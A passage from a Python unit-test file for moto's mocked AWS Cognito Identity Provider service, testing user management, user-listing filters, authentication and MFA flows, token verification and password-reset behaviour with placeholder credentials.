"us-west-2") value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] username = "test@example.com" conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) with pytest.raises(ClientError) as ex: username = "test@example.com" conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) err = ex.value.response["Error"] err["Code"].should.equal("UsernameExistsException") err["Message"].should.equal("test@example.com") @mock_cognitoidp def 
test_admin_create_existing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) caught = False try: conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) except conn.exceptions.UsernameExistsException: caught = True caught.should.be.true @mock_cognitoidp def test_admin_confirm_sign_up(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) password = "Passw0rd!" user_pool_id = conn.create_user_pool( PoolName="us-east-1_aaaaaaaa", AutoVerifiedAttributes=["email"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=False )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) user["UserStatus"].should.equal("UNCONFIRMED") conn.admin_confirm_sign_up(UserPoolId=user_pool_id, Username=username) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username,) user["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_admin_confirm_sign_up_non_existing_user(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName="us-east-1_aaaaaaaa", AutoVerifiedAttributes=["email"] )["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_confirm_sign_up(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def test_admin_confirm_sign_up_non_existing_pool(): conn = boto3.client("cognito-idp", "us-east-1") user_pool_id = "us-east-1_aaaaaaaa" with pytest.raises(ClientError) as exc: conn.admin_confirm_sign_up(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) err = exc.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal(f"User pool {user_pool_id} does not exist.") @mock_cognitoidp def test_admin_resend_invitation_existing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) caught = False try: conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], MessageAction="RESEND", ) except conn.exceptions.UsernameExistsException: caught = True caught.should.be.false @mock_cognitoidp def test_admin_resend_invitation_missing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], MessageAction="RESEND", ) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def 
test_admin_get_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["Username"].should.equal(username) result["UserAttributes"].should.have.length_of(2) @mock_cognitoidp def test_admin_get_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email", "phone_number"] )["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "thing", "Value": value}, {"Name": "phone_number", "Value": "+123456789"}, ], ) # verify user can be queried by email result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["Username"].should_not.equal(username) result["UserAttributes"].should.have.length_of(4) def _verify_attribute(name, v): attr = [a for a in result["UserAttributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("phone_number", "+123456789") _verify_attribute("email", "test@example.com") # verify user can be queried by phone number result = conn.admin_get_user(UserPoolId=user_pool_id, Username="+123456789") result["Username"].should_not.equal(username) result["UserAttributes"].should.have.length_of(4) _verify_attribute("phone_number", "+123456789") _verify_attribute("email", "test@example.com") # verify that the generate user sub is a valid UUID v4 [user_sub] = [ attr["Value"] for attr in result["UserAttributes"] if attr["Name"] == "sub" ] uuid.UUID(user_sub) # verify user should be queried by user sub result = conn.admin_get_user(UserPoolId=user_pool_id, Username=user_sub) result["Username"].should_not.equal(username) result["UserAttributes"].should.have.length_of(4) _verify_attribute("phone_number", "+123456789") _verify_attribute("email", "test@example.com") @mock_cognitoidp def test_admin_get_missing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def test_admin_get_missing_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def test_get_user(): conn = boto3.client("cognito-idp", "us-west-2") outputs = authentication_flow(conn, "ADMIN_NO_SRP_AUTH") result = conn.get_user(AccessToken=outputs["access_token"]) result["Username"].should.equal(outputs["username"]) result["UserAttributes"].should.have.length_of(2) def _verify_attribute(name, v): attr = [a for a in 
result["UserAttributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) for key, value in outputs["additional_fields"].items(): _verify_attribute(key, value) @mock_cognitoidp def test_get_user_unknown_accesstoken(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.get_user(AccessToken="n/a") err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("Invalid token") @mock_cognitoidp def test_list_users(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users(UserPoolId=user_pool_id) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username) username_bis = str(uuid.uuid4()) conn.admin_create_user( UserPoolId=user_pool_id, Username=username_bis, UserAttributes=[{"Name": "phone_number", "Value": "+33666666666"}], ) result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number="+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username_bis) # checking Filter with space result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number = "+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username_bis) user0_username = "user0@example.com" conn.admin_create_user( UserPoolId=user_pool_id, Username=user0_username, UserAttributes=[{"Name": "phone_number", "Value": "+48555555555"}], ) # checking Filter with prefix operator result = conn.list_users(UserPoolId=user_pool_id, Filter='phone_number ^= "+48"') result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(user0_username) # empty value Filter should also be supported result = conn.list_users(UserPoolId=user_pool_id, Filter='family_name=""') result["Users"].should.have.length_of(0) @mock_cognitoidp def test_list_users_incorrect_filter(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(conn.exceptions.InvalidParameterException) as exc: conn.list_users(UserPoolId=user_pool_id, Filter="username = foo") _assert_filter_parsing_error(exc) with pytest.raises(conn.exceptions.InvalidParameterException) as exc: conn.list_users(UserPoolId=user_pool_id, Filter="username=") _assert_filter_parsing_error(exc) def _assert_filter_parsing_error(exc): err = exc.value.response["Error"] assert err["Code"].should.equal("InvalidParameterException") assert err["Message"].should.equal("Error while parsing filter") @mock_cognitoidp def test_list_users_invalid_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(conn.exceptions.InvalidParameterException) as exc: conn.list_users(UserPoolId=user_pool_id, Filter='custom:foo = "bar"') err = exc.value.response["Error"] assert err["Code"].should.equal("InvalidParameterException") assert err["Message"].should.equal("Invalid search attribute: custom:foo") @mock_cognitoidp def test_list_users_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] 
conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users(UserPoolId=user_pool_id) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should_not.equal(username) def _verify_attribute(name, v): attr = [a for a in result["Users"][0]["Attributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("email", username) username_bis = "test2@uexample.com" conn.admin_create_user( UserPoolId=user_pool_id, Username=username_bis, UserAttributes=[{"Name": "phone_number", "Value": "+33666666666"}], ) result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number="+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should_not.equal(username_bis) uuid.UUID(result["Users"][0]["Username"]) _verify_attribute("email", username_bis) # checking Filter with space result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number = "+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should_not.equal(username_bis) _verify_attribute("email", username_bis) @mock_cognitoidp def test_list_users_inherent_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users(UserPoolId=user_pool_id) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username) # create a confirmed disabled user client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] disabled_user_username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=disabled_user_username) conn.confirm_sign_up( ClientId=client_id, Username=disabled_user_username, ConfirmationCode="123456" ) conn.admin_disable_user(UserPoolId=user_pool_id, Username=disabled_user_username) # filter, filter value, response field, response field expected value - all target confirmed disabled user filters = [ ("username", disabled_user_username, "Username", disabled_user_username), ("status", "Disabled", "Enabled", False), ("cognito:user_status", "CONFIRMED", "UserStatus", "CONFIRMED"), ] for name, filter_value, response_field, response_field_expected_value in filters: result = conn.list_users( UserPoolId=user_pool_id, Filter='{}="{}"'.format(name, filter_value) ) result["Users"].should.have.length_of(1) result["Users"][0][response_field].should.equal(response_field_expected_value) @mock_cognitoidp def test_get_user_unconfirmed(): if settings.TEST_SERVER_MODE: raise SkipTest("Cant patch attributes in server mode.") conn = boto3.client("cognito-idp", "us-west-2") outputs = authentication_flow(conn, "ADMIN_NO_SRP_AUTH") backend = moto.cognitoidp.models.cognitoidp_backends["us-west-2"] user_pool = backend.user_pools[outputs["user_pool_id"]] user_pool.users[outputs["username"]].status = "UNCONFIRMED" with pytest.raises(ClientError) as ex: conn.get_user(AccessToken=outputs["access_token"]) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("username") @mock_cognitoidp def test_list_users_returns_limit_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 users user_count = 10 for _ in range(user_count): 
conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) max_results = 5 result = conn.list_users(UserPoolId=user_pool_id, Limit=max_results) result["Users"].should.have.length_of(max_results) result.should.have.key("PaginationToken") @mock_cognitoidp def test_list_users_returns_pagination_tokens(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 users user_count = 10 for _ in range(user_count): conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) max_results = 5 result = conn.list_users(UserPoolId=user_pool_id, Limit=max_results) result["Users"].should.have.length_of(max_results) result.should.have.key("PaginationToken") next_token = result["PaginationToken"] result_2 = conn.list_users( UserPoolId=user_pool_id, Limit=max_results, PaginationToken=next_token ) result_2["Users"].should.have.length_of(max_results) result_2.shouldnt.have.key("PaginationToken") @mock_cognitoidp def test_list_users_when_limit_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 users user_count = 10 for _ in range(user_count): conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) max_results = user_count + 5 result = conn.list_users(UserPoolId=user_pool_id, Limit=max_results) result["Users"].should.have.length_of(user_count) result.shouldnt.have.key("PaginationToken") @mock_cognitoidp def test_admin_disable_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(False) @mock_cognitoidp def test_admin_disable_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(False) @mock_cognitoidp def test_admin_enable_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_enable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(True) @mock_cognitoidp def test_admin_enable_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, 
Username=username) conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_enable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(True) @mock_cognitoidp def test_admin_delete_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_delete_user(UserPoolId=user_pool_id, Username=username) with pytest.raises(ClientError) as exc: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") @mock_cognitoidp def test_admin_delete_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_delete_user(UserPoolId=user_pool_id, Username=username) with pytest.raises(ClientError) as ex: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("UserNotFoundException") def authentication_flow(conn, auth_flow): username = str(uuid.uuid4()) temporary_password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] user_attribute_name = str(uuid.uuid4()) user_attribute_value = str(uuid.uuid4()) client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), ReadAttributes=[user_attribute_name], )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=temporary_password, UserAttributes=[{"Name": user_attribute_name, "Value": user_attribute_value}], ) result = conn.admin_initiate_auth( UserPoolId=user_pool_id, ClientId=client_id, AuthFlow=auth_flow, AuthParameters={"USERNAME": username, "PASSWORD": temporary_password}, ) # A newly created user is forced to set a new password result["ChallengeName"].should.equal("NEW_PASSWORD_REQUIRED") result["Session"].should_not.be.none # This sets a new password and logs the user in (creates tokens) new_password = str(uuid.uuid4()) result = conn.respond_to_auth_challenge( Session=result["Session"], ClientId=client_id, ChallengeName="NEW_PASSWORD_REQUIRED", ChallengeResponses={"USERNAME": username, "NEW_PASSWORD": new_password}, ) result["AuthenticationResult"]["IdToken"].should_not.be.none result["AuthenticationResult"]["AccessToken"].should_not.be.none return { "user_pool_id": user_pool_id, "client_id": client_id, "id_token": result["AuthenticationResult"]["IdToken"], "access_token": result["AuthenticationResult"]["AccessToken"], "username": username, "password": new_password, "additional_fields": {user_attribute_name: user_attribute_value}, } @mock_cognitoidp def test_authentication_flow(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: authentication_flow(conn, auth_flow) def user_authentication_flow(conn): username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] user_attribute_name = str(uuid.uuid4()) 
user_attribute_value = str(uuid.uuid4()) client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), ReadAttributes=[user_attribute_name], GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up( ClientId=client_id, Username=username, Password=password, ) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) # generating secret hash key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result = conn.respond_to_auth_challenge( ClientId=client_id, ChallengeName=result["ChallengeName"], ChallengeResponses={ "PASSWORD_CLAIM_SIGNATURE": str(uuid.uuid4()), "PASSWORD_CLAIM_SECRET_BLOCK": result["Session"], "TIMESTAMP": str(uuid.uuid4()), "USERNAME": username, }, ) refresh_token = result["AuthenticationResult"]["RefreshToken"] # add mfa token conn.associate_software_token( AccessToken=result["AuthenticationResult"]["AccessToken"], ) conn.verify_software_token( AccessToken=result["AuthenticationResult"]["AccessToken"], UserCode="123456", ) conn.set_user_mfa_preference( AccessToken=result["AuthenticationResult"]["AccessToken"], SoftwareTokenMfaSettings={"Enabled": True, "PreferredMfa": True,}, ) result = conn.initiate_auth( ClientId=client_id, AuthFlow="REFRESH_TOKEN", AuthParameters={"SECRET_HASH": secret_hash, "REFRESH_TOKEN": refresh_token,}, ) result["AuthenticationResult"]["IdToken"].should_not.be.none result["AuthenticationResult"]["AccessToken"].should_not.be.none # authenticate user once again this time with mfa token result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result = conn.respond_to_auth_challenge( ClientId=client_id, ChallengeName=result["ChallengeName"], ChallengeResponses={ "PASSWORD_CLAIM_SIGNATURE": str(uuid.uuid4()), "PASSWORD_CLAIM_SECRET_BLOCK": result["Session"], "TIMESTAMP": str(uuid.uuid4()), "USERNAME": username, }, ) result = conn.respond_to_auth_challenge( ClientId=client_id, Session=result["Session"], ChallengeName=result["ChallengeName"], ChallengeResponses={ "SOFTWARE_TOKEN_MFA_CODE": "123456", "USERNAME": username, "SECRET_HASH": secret_hash, }, ) return { "user_pool_id": user_pool_id, "client_id": client_id, "client_secret": client_secret, "secret_hash": secret_hash, "id_token": result["AuthenticationResult"]["IdToken"], "access_token": result["AuthenticationResult"]["AccessToken"], "refresh_token": refresh_token, "username": username, "password": password, "additional_fields": {user_attribute_name: user_attribute_value}, } @mock_cognitoidp def test_user_authentication_flow(): conn = boto3.client("cognito-idp", "us-west-2") user_authentication_flow(conn) @mock_cognitoidp def test_token_legitimacy(): conn = boto3.client("cognito-idp", "us-west-2") path = "../../moto/cognitoidp/resources/jwks-public.json" with open(os.path.join(os.path.dirname(__file__), path)) as f: json_web_key = json.loads(f.read())["keys"][0] for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: outputs = 
authentication_flow(conn, auth_flow) id_token = outputs["id_token"] access_token = outputs["access_token"] client_id = outputs["client_id"] issuer = "https://cognito-idp.us-west-2.amazonaws.com/{}".format( outputs["user_pool_id"] ) id_claims = json.loads(jws.verify(id_token, json_web_key, "RS256")) id_claims["iss"].should.equal(issuer) id_claims["aud"].should.equal(client_id) id_claims["token_use"].should.equal("id") for k, v in outputs["additional_fields"].items(): id_claims[k].should.equal(v) access_claims = json.loads(jws.verify(access_token, json_web_key, "RS256")) access_claims["iss"].should.equal(issuer) access_claims["aud"].should.equal(client_id) access_claims["token_use"].should.equal("access") @mock_cognitoidp def test_change_password(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: outputs = authentication_flow(conn, auth_flow) # Take this opportunity to test change_password, which requires an access token. newer_password = str(uuid.uuid4()) conn.change_password( AccessToken=outputs["access_token"], PreviousPassword=outputs["password"], ProposedPassword=newer_password, ) # Log in again, which should succeed without a challenge because the user is no # longer in the force-new-password state. result = conn.admin_initiate_auth( UserPoolId=outputs["user_pool_id"], ClientId=outputs["client_id"], AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={ "USERNAME": outputs["username"], "PASSWORD": newer_password, }, ) result["AuthenticationResult"].should_not.be.none @mock_cognitoidp def test_change_password__using_custom_user_agent_header(): # https://github.com/spulec/moto/issues/3098 # As the admin_initiate_auth-method is unauthenticated, we use the user-agent header to pass in the region # This test verifies this works, even if we pass in our own user-agent header from botocore.config import Config my_config = Config(user_agent_extra="more/info", signature_version="v4") conn = boto3.client("cognito-idp", "us-west-2", config=my_config) for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: outputs = authentication_flow(conn, auth_flow) # Take this opportunity to test change_password, which requires an access token. newer_password = str(uuid.uuid4()) conn.change_password( AccessToken=outputs["access_token"], PreviousPassword=outputs["password"], ProposedPassword=newer_password, ) # Log in again, which should succeed without a challenge because the user is no # longer in the force-new-password state. 
result = conn.admin_initiate_auth( UserPoolId=outputs["user_pool_id"], ClientId=outputs["client_id"], AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={ "USERNAME": outputs["username"], "PASSWORD": newer_password, }, ) result["AuthenticationResult"].should_not.be.none @mock_cognitoidp def test_forgot_password(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] result = conn.forgot_password(ClientId=client_id, Username=str(uuid.uuid4())) result["CodeDeliveryDetails"]["Destination"].should.not_be.none result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("SMS") result["CodeDeliveryDetails"]["AttributeName"].should.equal("phone_number") @mock_cognitoidp def test_forgot_password_nonexistent_client_id(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.forgot_password(ClientId=create_id(), Username=str(uuid.uuid4())) err = ex.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal("Username/client id combination not found.") @mock_cognitoidp def test_forgot_password_admin_only_recovery(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "admin_only", "Priority": 1}] }, )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] with pytest.raises(ClientError) as ex: conn.forgot_password(ClientId=client_id, Username=str(uuid.uuid4())) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("Contact administrator to reset password.") @mock_cognitoidp def test_forgot_password_user_with_all_recovery_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_email", "Priority": 1}] }, )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "email", "Value": "test@moto.com"}, {"Name": "phone_number", "Value": "555555555"}, ], ) result = conn.forgot_password(ClientId=client_id, Username=username) result["CodeDeliveryDetails"]["Destination"].should.equal("test@moto.com") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("EMAIL") result["CodeDeliveryDetails"]["AttributeName"].should.equal("email") conn.update_user_pool( UserPoolId=user_pool_id, AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_phone_number", "Priority": 1}] }, ) result = conn.forgot_password(ClientId=client_id, Username=username) result["CodeDeliveryDetails"]["Destination"].should.equal("555555555") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("SMS") result["CodeDeliveryDetails"]["AttributeName"].should.equal("phone_number") @mock_cognitoidp def test_forgot_password_nonexistent_user_or_user_without_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": 
"verified_email", "Priority": 1}] }, )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] user_without_attributes = str(uuid.uuid4()) nonexistent_user = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=user_without_attributes) for user in user_without_attributes, nonexistent_user: result = conn.forgot_password(ClientId=client_id, Username=user) result["CodeDeliveryDetails"]["Destination"].should.equal(user + "@h***.com") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("EMAIL") result["CodeDeliveryDetails"]["AttributeName"].should.equal("email") conn.update_user_pool( UserPoolId=user_pool_id, AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_phone_number", "Priority": 1}] }, ) for user in user_without_attributes, nonexistent_user: result = conn.forgot_password(ClientId=client_id, Username=user) result["CodeDeliveryDetails"]["Destination"].should.equal("+*******9934") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("SMS") result["CodeDeliveryDetails"]["AttributeName"].should.equal("phone_number") @mock_cognitoidp def test_confirm_forgot_password_legacy(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) # Random confirmation code - opt out of verification conn.forgot_password(ClientId=client_id, Username=username) res = conn.confirm_forgot_password( ClientId=client_id, Username=username, 